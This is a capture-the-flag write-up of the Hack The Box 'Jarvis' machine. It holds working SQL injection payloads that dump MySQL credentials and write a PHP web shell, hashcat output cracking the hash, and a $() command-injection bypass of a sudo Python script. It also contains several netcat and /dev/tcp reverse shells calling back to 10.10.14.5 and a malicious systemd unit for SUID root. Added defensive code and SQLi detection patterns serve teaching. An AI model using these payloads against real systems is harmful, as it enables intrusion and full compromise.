Jarvis-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: SQL injection, reading the database's own account credentials through SQL injection, writing a shell through SQL injection, cracking a MySQL password hash with hashcat, sudo privilege escalation, Python script analysis, command injection via shell string concatenation to run a local command file, SUID privilege escalation

Reference: https://www.jgeek.cn/article/120.html

Reference: https://srmeirins.com/2023/08/09/jarvis-write-up/

Reference: https://0xrick.github.io/hack-the-box/jarvis/

0x01 Getting user access

1. Target IP: 10.10.10.143

2. Scan for open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.10.143
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 21:29 CST
Warning: 10.10.10.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.143
Host is up (0.29s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2333/tcp filtered snapp
6524/tcp filtered unknown
12446/tcp filtered unknown
19851/tcp filtered unknown
20528/tcp filtered unknown
21281/tcp filtered unknown
22255/tcp filtered unknown
22750/tcp filtered unknown
28608/tcp filtered unknown
36682/tcp filtered unknown
39808/tcp filtered unknown
40605/tcp filtered unknown
41865/tcp filtered unknown
45996/tcp filtered unknown
47026/tcp filtered unknown
48136/tcp filtered unknown
58527/tcp filtered unknown
60195/tcp filtered unknown
60739/tcp filtered unknown
63046/tcp filtered unknown
64334/tcp filtered unknown
64999/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 25.21 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allport | awk -F/ '{print $1}' | tr '\n' ','
22,80,64999,

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,64999 -Pn --min-rate=10000 10.10.10.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 21:43 CST
Nmap scan report for 10.10.10.143
Host is up (0.29s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
64999/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allport1 10.10.10.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 21:48 CST
Warning: 10.10.10.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.143
Host is up (0.45s latency).
All 65535 scanned ports on 10.10.10.143 are in ignored states.
Not shown: 65459 open|filtered udp ports (no-response), 76 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 89.51 seconds

3. Two web services are open; start with a directory scan of the less common one (port 64999)

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.143:64999/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.143_64999/__24-01-08_21-51-53.txt

Target: http://10.10.10.143:64999/

[21:51:53] Starting:
[21:52:11] 403 - 280B - /.ht_wsr.txt
[21:52:11] 403 - 280B - /.htaccess.bak1
[21:52:11] 403 - 280B - /.htaccess.orig
[21:52:11] 403 - 280B - /.htaccess.save
[21:52:11] 403 - 280B - /.htaccess_extra
[21:52:11] 403 - 280B - /.htaccess.sample
[21:52:11] 403 - 280B - /.htaccess_orig
[21:52:11] 403 - 280B - /.htaccess_sc
[21:52:11] 403 - 280B - /.htaccessBAK
[21:52:11] 403 - 280B - /.htaccessOLD
[21:52:11] 403 - 280B - /.htaccessOLD2
[21:52:11] 403 - 280B - /.htm
[21:52:11] 403 - 280B - /.html
[21:52:11] 403 - 280B - /.htpasswd_test
[21:52:11] 403 - 280B - /.httr-oauth
[21:52:12] 403 - 280B - /.htpasswds
[21:52:15] 403 - 280B - /.php
[21:52:16] 403 - 280B - /.php3
[21:56:39] 403 - 280B - /server-status/
[21:56:39] 403 - 280B - /server-status

Task Completed

4. Looking at the service on port 64999, it appears to apply rate limiting

5. The site on port 80 reveals a domain name; add a local hosts entry for it

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.143 supersecurehotel.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.143 supersecurehotel.htb

6. Basic enumeration of the site shows a SQL injection vulnerability (the cod parameter of room.php)

http://10.10.10.143/room.php?cod=1%20and%201=1

http://10.10.10.143/room.php?cod=1%20and%201=2

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,5,6,7

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,@@version,3,4,5,6,7

# Standard enumeration queries

DBadmin@localhost
hotel

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=0x686f74656c

room

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name=0x726f6f6d

cod,name,price,descrip,star,image,mini

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,name,6,7 from room

Superior Family Room

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,group_concat(schema_name),6,7 from information_schema.schemata

hotel,information_schema,mysql,performance_schema
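The injection above works because the cod value is pasted straight into the SQL text. The following is an added example, not code from the page or from the Jarvis box: a small SQLite stand-in for the hotel database (column names taken from the enumeration above, row values constructed) with the vulnerable string-building lookup next to a parameterized one, so the same probes used above can be compared side by side.

```python
import sqlite3

# Constructed sample rows; the column names are the ones enumerated from
# hotel.room above, the values are made up for this example.
SAMPLE_ROOMS = [
    (1, "Superior Family Room", 200, "Sample description", 4, "1.jpg", "1-mini.jpg"),
    (2, "Sample Suite", 350, "Another sample description", 5, "2.jpg", "2-mini.jpg"),
]

COLUMNS = "cod,name,price,descrip,star,image,mini"


def make_db():
    """In-memory SQLite database standing in for the MySQL 'hotel' schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE room (cod INTEGER, name TEXT, price INTEGER, descrip TEXT,"
        " star INTEGER, image TEXT, mini TEXT)"
    )
    conn.executemany("INSERT INTO room VALUES (?,?,?,?,?,?,?)", SAMPLE_ROOMS)
    return conn


def lookup_room_vulnerable(conn, cod):
    """The failure mode behind room.php?cod=...: the raw parameter is pasted
    into the SQL text, so 'and 1=2' or 'UNION SELECT ...' become part of the
    query instead of being compared against the cod column."""
    sql = f"SELECT {COLUMNS} FROM room WHERE cod=" + cod
    return conn.execute(sql).fetchall()


def lookup_room_safe(conn, cod):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so the database never parses it as SQL."""
    try:
        cod_int = int(cod)
    except ValueError:
        return []
    sql = f"SELECT {COLUMNS} FROM room WHERE cod=?"
    return conn.execute(sql, (cod_int,)).fetchall()


def compare(cod):
    """Run one input through both lookups; returns (vulnerable, safe) row counts."""
    conn = make_db()
    vulnerable = lookup_room_vulnerable(conn, cod)
    safe = lookup_room_safe(conn, cod)
    conn.close()
    return len(vulnerable), len(safe)


if __name__ == "__main__":
    for probe in ("1", "1 and 1=1", "1 and 1=2", "-1 UNION SELECT 1,2,3,4,5,6,7"):
        v, s = compare(probe)
        print(f"{probe!r:40} vulnerable={v} safe={s}")
```

The boolean pair (1=1 vs 1=2) changes the row count only in the vulnerable lookup, and the UNION probe returns the attacker-chosen row only there; in the parameterized version the same strings simply fail the integer check. In the PHP application on the box the equivalent fix is a PDO or mysqli prepared statement with the value bound as a parameter.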

7. Now pull the database's own account credentials directly. The query below reads the mysql.user system table, whose layout is fixed in MySQL.

http://10.10.10.143/room.php?cod=-1 UNION SELECT 1,2,3,4,concat(host,0x3a,user,0x3a,password),6,7 from mysql.user

localhost:DBadmin:*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

8. Crack the database password hash with hashcat

shiyan@InfoSec hashcat-6.2.6 % sudo hashcat -a 0 -m 300 ./test/hashes ./dict-list/rockyou.txt
hashcat (v6.2.6) starting

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
You have been warned.

METAL API (Metal 341.29)
========================
* Device #1: Apple M2 Pro, 5408/10922 MB, 19MCU

OpenCL API (OpenCL 1.2 (Sep 30 2023 03:48:09)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M2 Pro, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 100c

Host memory required for this attack: 333 MB

Dictionary cache built:
* Filename..: ./dict-list/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

2d2b7a5e4e637b8fba1d17f40318f277d29964d0:imissyou

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: 2d2b7a5e4e637b8fba1d17f40318f277d29964d0
Time.Started.....: Mon Jan 8 22:46:46 2024 (0 secs)
Time.Estimated...: Mon Jan 8 22:46:46 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./dict-list/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 66441.7 kH/s (7.89ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1245184/14344385 (8.68%)
Rejected.........: 0/1245184 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> swetieko
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util: 75%

Started: Mon Jan 8 22:46:39 2024
Stopped: Mon Jan 8 22:46:47 2024
shiyan@InfoSec hashcat-6.2.6 %
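Hashcat finishes in seconds because the hash format leaked from mysql.user (mysql_native_password) is unsalted and uniterated. The following is an added example, not code from the page: it reproduces that scheme with hashlib so the recovered hash can be verified against one candidate, and it shows the form hashcat -m 300 expects.

```python
import hashlib

# Hash recovered from mysql.user on the page (mysql_native_password format).
LEAKED_HASH = "*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0"


def mysql_native_password_hash(password: str) -> str:
    """MySQL's mysql_native_password scheme, the '*...' values in mysql.user:
    '*' + upper-case hex of SHA1(SHA1(password)). There is no salt and no
    iteration count, so every candidate costs two SHA-1 calls and identical
    passwords produce identical hashes on every server."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def hash_matches(candidate: str, stored: str) -> bool:
    """Compare one candidate against a stored hash; hex case is ignored and a
    missing leading '*' (hashcat's input form) is tolerated."""
    stored = stored.lstrip("*").lower()
    return mysql_native_password_hash(candidate).lstrip("*").lower() == stored


def hashcat_input_format(stored: str) -> str:
    """What hashcat -m 300 (MySQL4.1/MySQL5) takes: the 40 hex digits without '*'."""
    return stored.lstrip("*").lower()


if __name__ == "__main__":
    print(hashcat_input_format(LEAKED_HASH))
    print("imissyou ->", hash_matches("imissyou", LEAKED_HASH))
```

Two defensive takeaways follow from this. The web application's database account had SELECT on mysql.user; granting it privileges only on the hotel schema would have made the step 7 query fail with a permission error. And MySQL 8's default caching_sha2_password stores a salted, iterated SHA-256, so a leaked hash is no longer a wordlist away from the password.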

9. I forgot to scan the web root here; doing so actually reveals a phpmyadmin directory

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.143
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.143/_24-01-08_22-20-05.txt

Target: http://10.10.10.143/

[22:20:05] Starting:
[22:20:12] 301 - 309B - /js -> http://10.10.10.143/js/
[22:20:21] 403 - 277B - /.ht_wsr.txt
[22:20:21] 403 - 277B - /.htaccess.orig
[22:20:21] 403 - 277B - /.htaccess.bak1
[22:20:22] 403 - 277B - /.htaccess.sample
[22:20:22] 403 - 277B - /.htaccess_orig
[22:20:22] 403 - 277B - /.html
[22:20:22] 403 - 277B - /.htm
[22:20:22] 403 - 277B - /.htaccess.save
[22:20:22] 403 - 277B - /.htaccess_extra
[22:20:22] 403 - 277B - /.htaccessBAK
[22:20:22] 403 - 277B - /.htpasswds
[22:20:22] 403 - 277B - /.htpasswd_test
[22:20:22] 403 - 277B - /.httr-oauth
[22:20:22] 403 - 277B - /.htaccess_sc
[22:20:22] 403 - 277B - /.htaccessOLD2
[22:20:22] 403 - 277B - /.htaccessOLD
[22:20:26] 403 - 277B - /.php3
[22:20:26] 403 - 277B - /.php
[22:21:40] 301 - 310B - /css -> http://10.10.10.143/css/
[22:21:52] 200 - 755B - /footer.php
[22:21:52] 301 - 312B - /fonts -> http://10.10.10.143/fonts/
[22:22:00] 301 - 313B - /images -> http://10.10.10.143/images/
[22:22:00] 200 - 814B - /images/
[22:22:04] 200 - 676B - /js/
[22:22:28] 301 - 317B - /phpmyadmin -> http://10.10.10.143/phpmyadmin/
[22:22:31] 200 - 1KB - /phpmyadmin/README
[22:22:31] 200 - 4KB - /phpmyadmin/index.php
[22:22:31] 200 - 3KB - /phpmyadmin/doc/html/index.html
[22:22:31] 200 - 19KB - /phpmyadmin/ChangeLog
[22:22:31] 200 - 4KB - /phpmyadmin/
[22:22:44] 403 - 277B - /server-status/
[22:22:44] 403 - 277B - /server-status

Task Completed

10. Logging in with the cracked password works

http://10.10.10.143/phpmyadmin/

DBadmin:imissyou

11. Since this is a lab box, write a shell directly through the SQL injection

http://10.10.10.143/room.php?cod=-1 union select 1,2,"<?php system('nc -e /bin/bash 10.10.14.5 443'); ?>",4,5,6,7 into outfile "/var/www/html/reverse.php"-- -

http://10.10.10.143/reverse.php
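Every step of the injection above, from the boolean probe to the INTO OUTFILE write, lands in the web server's access log. The following is an added detection example, not code from the page: it parses Apache-style log lines (constructed here, with request paths mirroring the ones used above but a harmless PHP payload), URL-decodes the request and flags the SQL injection signatures a defender would alert on.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache common-format log lines for this example.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Jan/2024:21:58:01 +0800] "GET /room.php?cod=1 HTTP/1.1" 200 7413
10.10.14.5 - - [08/Jan/2024:21:58:12 +0800] "GET /room.php?cod=1%20and%201=2 HTTP/1.1" 200 6910
10.10.14.5 - - [08/Jan/2024:21:59:03 +0800] "GET /room.php?cod=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7 HTTP/1.1" 200 7201
10.10.14.5 - - [08/Jan/2024:22:01:44 +0800] "GET /room.php?cod=-1%20UNION%20SELECT%201,2,3,4,group_concat(table_name),6,7%20from%20information_schema.tables%20where%20table_schema=0x686f74656c HTTP/1.1" 200 7255
10.10.14.5 - - [08/Jan/2024:22:30:10 +0800] "GET /room.php?cod=-1%20union%20select%201,2,%22%3C?php%20system('id');%20?%3E%22,4,5,6,7%20into%20outfile%20%22/var/www/html/reverse.php%22--%20- HTTP/1.1" 200 7100
10.10.14.5 - - [08/Jan/2024:22:30:25 +0800] "GET /reverse.php HTTP/1.1" 200 41
10.10.14.7 - - [08/Jan/2024:22:31:00 +0800] "GET /room.php?cod=2 HTTP/1.1" 200 7402
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures checked against the URL-decoded request path.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),
    "schema_enum": re.compile(r"information_schema|mysql\.user", re.I),
    "file_write": re.compile(r"into\s+(out|dump)file", re.I),
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "php_tag": re.compile(r"<\?php", re.I),
}


def parse_line(line):
    """Return the parsed fields plus the decoded path, or None for a non-matching line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["path"])
    return rec


def classify(line):
    """Attach the list of matching signature names to a parsed record."""
    rec = parse_line(line)
    if rec is None:
        return None
    rec["hits"] = [name for name, rx in SIGNATURES.items() if rx.search(rec["decoded"])]
    return rec


def severity(hits):
    """Writing files or shipping PHP is critical; data extraction is high."""
    if "file_write" in hits or "php_tag" in hits:
        return "critical"
    if "union_select" in hits or "schema_enum" in hits:
        return "high"
    return "medium" if hits else "none"


def scan(log_text):
    """Return only the records that matched at least one signature."""
    findings = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["hits"]:
            findings.append(rec)
    return findings


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], severity(rec["hits"]), rec["hits"], rec["decoded"][:70])
```

On the database side, the write in step 11 needs the FILE privilege and a secure_file_priv setting that allows the target directory; withholding FILE from the application account and pointing secure_file_priv at a directory outside the web root removes this path even if the injection itself remains.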

12. Initial shell obtained

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.143] 54230
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jarvis:/var/www/html$

13. sudo -l shows the current user has a sudo entry

www-data@jarvis:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/html$

14. Analyse the script

www-data@jarvis:/var/www/html$ ls -la /var/www/Admin-Utilities/simpler.py
ls -la /var/www/Admin-Utilities/simpler.py
-rwxr--r-- 1 pepper pepper 4587 Mar 4 2019 /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/html$ cat /var/www/Admin-Utilities/simpler.py
cat /var/www/Admin-Utilities/simpler.py
#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    '''
    print(message)

def show_header():
    print('''***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es

***********************************************
''')

def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()

    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1

    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)

def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req

def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}
    return month_dict[name]

def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()
www-data@jarvis:/var/www/html$

15. The key code is in the exec_ping function:

When the script is run under sudo with the -p option, it reads a string from the user.
If the string contains anything on the blocklist the script exits; otherwise the string is concatenated onto a command and passed to the system shell.
Because the filter is a blocklist, a bypass is easy to find: the combination of $, ( and ) is missing from the list. For example:

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

echo -e '#!/bin/bash\n\nbash -c "sh -i >& /dev/tcp/10.10.14.5/4333 0>&1"' > /tmp/shell
chmod +x /tmp/shell

Then run the script under sudo with the -p option and enter 127.0.0.1$(/tmp/shell) to get a shell as pepper.

16. Exploit it to get the first user
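The defect in exec_ping is the blocklist plus os.system: the shell, not the script, decides what the string means. The following is an added example, not code from the box: it keeps the original check as blocklist_allows for comparison and replaces it with an allowlist (the input must parse as an IP literal via ipaddress) and an argv list handed to subprocess without a shell. The -c flag and count of 3 are my choices.

```python
import ipaddress
import subprocess

# The blocklist from simpler.py, kept only to show what it misses.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blocklist_allows(user_input: str) -> bool:
    """The original check: reject only if a listed substring is present.
    $(...) contains none of them, so it passes untouched."""
    return not any(bad in user_input for bad in FORBIDDEN)


def parse_ip(user_input: str) -> str:
    """Allowlist check: the input must parse as an IPv4 or IPv6 literal.
    Raises ValueError for anything else, including an IP with trailing junk."""
    return str(ipaddress.ip_address(user_input.strip()))


def is_accepted(user_input: str) -> bool:
    try:
        parse_ip(user_input)
        return True
    except ValueError:
        return False


def build_ping_argv(user_input: str, count: int = 3) -> list:
    """Argument vector for ping. Passed as a list with shell=False, so no shell
    ever tokenises the user's text; the validated IP is a single argv entry."""
    return ["ping", "-c", str(count), parse_ip(user_input)]


def run_ping(user_input: str) -> int:
    """Run ping for a validated address and return its exit status."""
    return subprocess.run(build_ping_argv(user_input), check=False).returncode


if __name__ == "__main__":
    target = input("Enter an IP: ")
    if not is_accepted(target):
        print("Not an IP address")
        raise SystemExit(1)
    raise SystemExit(run_ping(target))
```

The sudoers entry itself is the other half of the risk: a NOPASSWD rule that lets www-data run any script as pepper makes every input-handling bug in that script a privilege boundary, so such rules deserve the same review as the code they point at.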

www-data@jarvis:/var/www/html$ echo -e '#!/bin/bash\n\nbash -c "sh -i >& /dev/tcp/10.10.14.5/4333 0>&1"' > /tmp/shell
< -i >& /dev/tcp/10.10.14.5/4333 0>&1"' > /tmp/shell
www-data@jarvis:/var/www/html$ chmod +x /tmp/shell
chmod +x /tmp/shell
www-data@jarvis:/var/www/html$

www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
<do -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************

Enter an IP: Enter an IP: 127.0.0.1$(/tmp/shell)
Enter an IP: 127.0.0.1$(/tmp/shell)

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 4333
listening on [any] 4333 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.143] 36306
$ id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
pepper@jarvis:/var/www/html$

17. Read the first user's flag

pepper@jarvis:/var/www/html$ cd ~
cd ~
pepper@jarvis:~$ ls
ls
Web user.txt
pepper@jarvis:~$ cat user.txt
cat user.txt
196344f574503a6a783d69089c15efc3
pepper@jarvis:~$

0x02 Getting root

18. List SUID binaries

pepper@jarvis:~$ find / -perm -4000 2>/dev/null 
find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
pepper@jarvis:~$ ls -la /bin/systemctl
ls -la /bin/systemctl
-rwsr-x--- 1 root pepper 174520 Jun 29 2022 /bin/systemctl
pepper@jarvis:~$

19. Exploit it following GTFOBins

https://gtfobins.github.io/gtfobins/systemctl/#suid

echo -e '[Service]\nType=oneshot\nExecStart=/bin/bash -c "nc -e /bin/bash 10.10.14.5 10086"\n[Install]\nWantedBy=multi-user.target' > /dev/shm/srmeirins.service

systemctl link /dev/shm/srmeirins.service

# Start a listener on the local machine first --> nc -lvnp 10086

systemctl enable --now srmeirins

20. Root obtained

pepper@jarvis:~$ echo -e '[Service]\nType=oneshot\nExecStart=/bin/bash -c "nc -e /bin/bash 10.10.14.5 10086"\n[Install]\nWantedBy=multi-user.target' > /dev/shm/srmeirins.service
<dBy=multi-user.target' > /dev/shm/srmeirins.service
pepper@jarvis:~$ systemctl link /dev/shm/srmeirins.service
systemctl link /dev/shm/srmeirins.service
Created symlink /etc/systemd/system/srmeirins.service -> /dev/shm/srmeirins.service.
pepper@jarvis:~$ systemctl enable --now srmeirins
systemctl enable --now srmeirins
Created symlink /etc/systemd/system/multi-user.target.wants/srmeirins.service -> /dev/shm/srmeirins.service.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.143] 32950
id
uid=0(root) gid=0(root) groups=0(root)
